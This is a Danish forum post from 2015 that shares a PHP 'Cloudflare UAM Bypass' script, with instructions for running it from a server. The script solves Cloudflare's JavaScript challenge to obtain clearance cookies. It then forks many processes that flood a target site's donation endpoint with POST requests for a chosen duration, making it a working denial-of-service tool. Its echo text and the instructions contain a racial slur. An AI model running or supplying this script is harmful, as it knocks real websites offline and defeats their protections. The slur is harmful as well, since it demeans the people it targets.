23-08-2015, 23:32
Du executor scriptet på din server med PHP.
Eksempel: php var/tmp/cf.php http://site.com/ 0 150 86400
Hvis du har startet scriptet korrekt får du et echo med følgende tekst: "Starting the shit nigga"
Hints:
Hvis php ikke er installeret, installer det. yum, apt-get eller andet you know the drill.
chmod 777 filnavn.php
Resten er forklaret ovenover :)
Love to shellsec
Eksempel: php var/tmp/cf.php http://site.com/ 0 150 86400
Hvis du har startet scriptet korrekt får du et echo med følgende tekst: "Starting the shit nigga"
Hints:
Hvis php ikke er installeret, installer det. yum, apt-get eller andet you know the drill.
chmod 777 filnavn.php
Resten er forklaret ovenover :)
Love to shellsec
Spoiler (Click to View)
<?PHP
/*
Sc0rp10n <sc0rp10n@entropy.im>
Cloudflare UAM Bypass (CFBYPASS)
BETA version - sorry for flaws </3
Ok brows, i har været så søde at jeg har smidt nogle hints ud til at bruge mit script.
*/
error_reporting(0);
function multiequation($string) {
preg_match("/\)\+\(/", $string, $data);
if ($data == NULL) {
return false; }
else {
return true;
}
}
function rand_line($fileName, $maxLineLength = 4096) {
$handle = @fopen($fileName, "r");
if ($handle) {
$random_line = null;
$line = null;
$count = 0;
while (($line = fgets($handle, $maxLineLength)) !== false) {
$count++;
if(rand() % $count == 0) {
$random_line = $line;
}
}
if (!feof($handle)) {
echo "Error: unexpected fgets() fail\n";
fclose($handle);
return null;
} else {
fclose($handle);
}
return $random_line;
}
}
function cfbypass($domain, $proxy, $useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1")
{
$rd = explode("/", $domain);
$tlen = strlen($rd[2]);
$array = array();
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $domain);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_HEADER, 1);
curl_setopt($cURL, CURLOPT_PROXY, $proxy);
curl_setopt($cURL, CURLOPT_USERAGENT, $useragent);
curl_setopt($cURL, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cURL, CURLOPT_COOKIEFILE, "cookie.txt");
$data = curl_exec($cURL);
preg_match("/var t,r,a,f,(.*?)\"/", $data, $jschl_vc);
preg_match("/setTimeout\(function\(\){(.*?);a\.value/s", $data, $vars);
$full = trim($vars[1]);
preg_match("/var t,r,a,f,(.*?):/", $full, $mainvar);
$mvar = explode("=", trim($mainvar[1]));
preg_match("/\"(.*?)\"/", $mvar[1], $v2);
$fvar = "".$mvar[0].".".$v2[1]."";
list($line1) = explode("\n", $full);
$equation1 = explode(":", $line1);
preg_match_all("/\((.*?)\)/", $equation1[1], $eq1m, PREG_SET_ORDER);
$count = count($eq1m);
if ($count == 0) {
$lmao = explode("}", $equation1[1]);
$yolo = explode("+", $lmao[0]);
$nc = 0;
foreach ($yolo as $int) {
if ($int == "!" || $int == "!![]" || $int == "![]") {
$nc++;
}
}
$ans1 = "$nc\n";
} else {
foreach ($eq1m as $eq) {
if (substr($eq[1], 0, 1) == "(") {
$furl = substr($eq[1], 1);
$yolo1 = explode("+", $furl);
$mc = 0;
foreach ($yolo1 as $int1) {
if ($int1 == "!" || $int1 == "!![]" || $int1 == "![]") {
$mc++;
}
}
} else {
$yolo2 = explode("+", $eq[1]);
$mc1 = 0;
foreach ($yolo2 as $int2) {
if ($int2 == "!" || $int2 == "!![]" || $int2 == "![]") {
$mc1++;
}
}
}
}
$ans1 = "$mc$mc1\n";
}
preg_match("/$fvar(.*?);a\.value/s", $data, $NowWeActuallyStart);
$itbegins = explode(";", $NowWeActuallyStart[1]);
foreach ($itbegins as $begin) {
$first = substr($begin, 0, 1);
if (!ctype_alpha($first)) {
$operator = substr($begin, 0, 3);
$top = substr($begin, 0);
$lick = "".$fvar."".$top."";
$mathit = explode("=", $lick);
$oper = substr($operator, 0, 1);
$solve1 = explode("+", $mathit[1]);
$c1 = 0;
if (multiequation($mathit[1]) == FALSE) {
foreach ($solve1 as $boolv1) {
if ($boolv1 == "!" || $boolv1 == "!![]" || $boolv1 == "![]") {
$c1++;
}
}
array_push($array, "$c1$oper");
} else if (multiequation($mathit[1]) == TRUE) {
$swag1 = explode(")+(", $mathit[1]);
foreach ($swag1 as $swiggity1) {
$first1 = substr($swiggity1, 0, 3);
if ($first1 == "+((") {
$new1 = substr($swiggity1, 3);
$firstlast1 = explode("+", $new1);
$soclose1 = 0;
foreach ($firstlast1 as $me11) {
if ($me11 == "!" || $me11 == "!![]" || $me11 == "![]") {
$soclose1++;
}
}
} else {
$new21 = substr($swiggity1, 0, -2);
$lastlast1 = explode("+", $new21);
$ending1 = 0;
foreach ($lastlast1 as $me21) {
if ($me21 == "!" || $me21 == "!![]" || $me21 == "![]") {
$ending1++;
}
}
}
}
$fanswer1 = "".$soclose1."".$ending1."";
array_push($array, "$fanswer1$oper");
}
} else {
$operator = substr($begin, strlen($fvar), 3);
$top = substr($begin, 0);
$oper = substr($operator, 0, 1);
$mathit = explode("=", $begin);
$solve2 = explode("+", $mathit[1]);
$c21 = 0;
if (multiequation($mathit[1]) == FALSE) {
foreach ($solve2 as $boolv2) {
if ($boolv2 == "!" || $boolv2 == "!![]" || $boolv2 == "![]") {
$c21++;
}
}
array_push($array, "$c21$oper");
} else if (multiequation($mathit[1]) == TRUE) {
$swag = explode(")+(", $mathit[1]);
foreach ($swag as $swiggity) {
$first = substr($swiggity, 0, 3);
if ($first == "+((") {
$new = substr($swiggity, 3);
$firstlast = explode("+", $new);
$soclose = 0;
foreach ($firstlast as $me1) {
if ($me1 == "!" || $me1 == "!![]" || $me1 == "![]") {
$soclose++;
}
}
} else {
$new2 = substr($swiggity, 0, -2);
$lastlast = explode("+", $new2);
$ending = 0;
foreach ($lastlast as $me2) {
if ($me2 == "!" || $me2 == "!![]" || $me2 == "![]") {
$ending++;
}
}
}
}
$fanswer = "".$soclose."".$ending."";
array_push($array, "$fanswer$oper");
}
}
}
$FINALLY = $ans1;
foreach($array as $element) {
$method = substr($element, -1);
$number = substr($element, 0, -1);
if ($method == "+") {
$FINALLY += $number;
} else if ($method == "-") {
$FINALLY -= $number;
} else if ($method == "*") {
$FINALLY = $FINALLY * $number;
}
}
$tba = ($FINALLY + $tlen);
preg_match("/jschl_vc\" value=\"(.*?)\"/", $data, $cid);
$url = "".$domain."cdn-cgi/l/chk_jschl?jschl_vc=$cid[1]&jschl_answer=$tba";
$check = curl_init();
curl_setopt($check, CURLOPT_URL, $url);
curl_setopt($check, CURLOPT_RETURNTRANSFER, true);
curl_setopt($check, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($check, CURLOPT_USERAGENT, $useragent);
curl_setopt($check, CURLOPT_PROXY, $proxy);
curl_setopt($check, CURLOPT_HEADER, 1);
curl_setopt($check, CURLOPT_COOKIEFILE, "cookie.txt");
$data2 = curl_exec($check);
preg_match_all('/^Set-Cookie:\s*([^\r\n]*)/mi', $data2, $ms);
$cookies = array();
foreach ($ms[1] as $m) {
list($name, $value) = explode('=', $m, 2);
$cookies[$name] = $value;
}
$cookie = '';
foreach ($cookies as $key => $value) {
$cookie .= ($key) ."=". ($value);
}
$bypasscookies = explode(";", $cookie);
$cfduid = $bypasscookies[0];
$cf_clearence = substr($bypasscookies[4], 9);
$bypasscookie = "".$cfduid."; ".$cf_clearence."";
return $bypasscookie;
}
if($argc != 5) {
echo "You're not permitted to use this!";
die();
}
$end = time() + $argv[4];
$childcount = $argv[3];
echo "Starting the shit nigga\n";
for($i = 0; $i < $childcount; $i ++)
{
$pid = pcntl_fork();
if ($pid == -1) {
echo "failed to fork on loop $i of forking\n";
exit;
} else if ($pid) {
continue;
} else {
while($end > time()) {
$fields = array( 'cause'=> 'donation-for-august', 'amount'=> 15, 'submit.x'=> 76, 'submit.y' => 19);
$postvars = '';
foreach($fields as $key=>$value) {
$postvars .= urlencode($key) . "=" . urlencode($value) . "&";
}
$manga = curl_init();
curl_setopt($manga, CURLOPT_URL, $argv[1]."donation_can_ipn/start_donation");
curl_setopt($manga, CURLOPT_RETURNTRANSFER, true);
curl_setopt($manga, CURLOPT_POST, 1);
curl_setopt($manga, CURLOPT_POSTFIELDS, $postvars);
curl_setopt($manga, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($manga, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1");
curl_setopt($manga, CURLOPT_HEADER, 1);
curl_exec($manga);
curl_close($manga);
}
die;
}
}
for($j = 0; $j < $childcount; $j++)
{
$pid = pcntl_wait($status);
}